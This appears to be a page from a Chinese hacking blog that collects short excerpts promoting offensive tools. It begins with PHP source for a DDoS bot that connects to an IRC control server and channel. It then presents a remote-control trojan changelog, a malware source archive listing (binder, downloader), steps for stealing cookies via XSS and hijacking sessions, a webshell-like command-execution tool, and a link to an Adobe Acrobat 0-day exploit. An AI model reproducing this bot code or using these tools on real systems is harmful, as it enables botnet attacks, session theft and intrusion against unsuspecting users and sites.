来源:amxku's blog
<?php
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);
while ($read = fgets($verbinden,512)) {
阅读全文 »
来源:XG's Blog
history
说明
修正bug
[+]增加功能
[-]去掉功能
[PS]附加说明
2007-10-10 var 1.2 b6
关闭客户端当有聊天窗口服务端不能关闭
服务端有时CPU占用100%
屏幕监控界面改进
修改备注要重启服务端显示
[+]屏幕监控鼠标轨迹
[+]屏幕监控保存为jpg格式图片
[+]备用上线地址
[+]消息广播
[+]3端口同时监听
[+]被控端解析program files目录
[-]被控端解析temp目录
2007-10-7 16:47:09 var 1.1 b5
屏幕监控关闭后,有时服务端吃了cpu问题
[+]参数设置
[+]部分Hint提示
[+]任意可视窗口闪屏
2007-10-3 VAR 1.1 bate1
阅读全文 »
鬼仔注:在 清雅风萍 那里看到的,给了一个下载链接,我弄了下文件列表,抓了张图,box允许单文件最大10M,没办法,传到了Live SkyDrive上提供下载。其中有几个以前已经发过了。
# 压缩文件 C:\Documents and Settings\鬼仔\桌面\特南克斯源码.rar
2007-03-04 16:48 文件夹 文件夹 myBindFile
2007-03-04 16:48 文件夹 文件夹 opents
2007-03-04 16:48 文件夹 文件夹 SetDownloader
2007-03-04 16:48 文件夹 文件夹 便捷3389
2007-03-04 阅读全文 »
作者:cnqing
来源:中国互联网信息安全团队
SeesionIE v1021 beta
说明:
利用COOKIE信息来伪造会话的工具,内置winpcap.类似“黑帽”聚会中的hamster
v1.0.2.1更新:
1.去除了DEV皮肤控件
2.修正了多次覆盖COOKIE的Bug
整个过程分两步
A.xss取cookie
B.利用cookie伪造session
==========================================================================
Example:
A:
1.将下载的hkcxss.asp放到支持ASP的服务器,这里是http://www.cncert.net/xss/c.asp。
这是盗cookie脚本,结果存为同目录的cookies.xml
阅读全文 »
作者:cnqing
来源:中国互联网信息安全团队
WEBMS beta版
红客中国WEBMS是基于ASP.NET 2.0开发的一个实时的在线网站管理系统,基本包含以下几个功能:
1.文件管理:进行权限范围内的文件上传、新建、删除、修改、复制、粘贴、下载等功能。界面如图:
2.进程管理:进行权限范围内的进程列表,进程结束。界面如图:
3.CMD执行:执行权限范围内的任意命令,支持自定义CMD路径:
4.数据库管理:进行权限范围内的数据查询,自动分析数据表,字段,暂不支持修改:
阅读全文 »
来源:Ph4nt0m Google Group
Link to exploit:
Please download and open it locally in Adobe Acrobat (not in Adobe Acrobat
ActiveX control):
http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf
Description:
0-day proof of concept (PoC) exploit for Adobe Acrobat.
Software affected:
+ Adobe Reader 8.1 (and earlier)
+ Adobe Acrobat Standard, 阅读全文 »
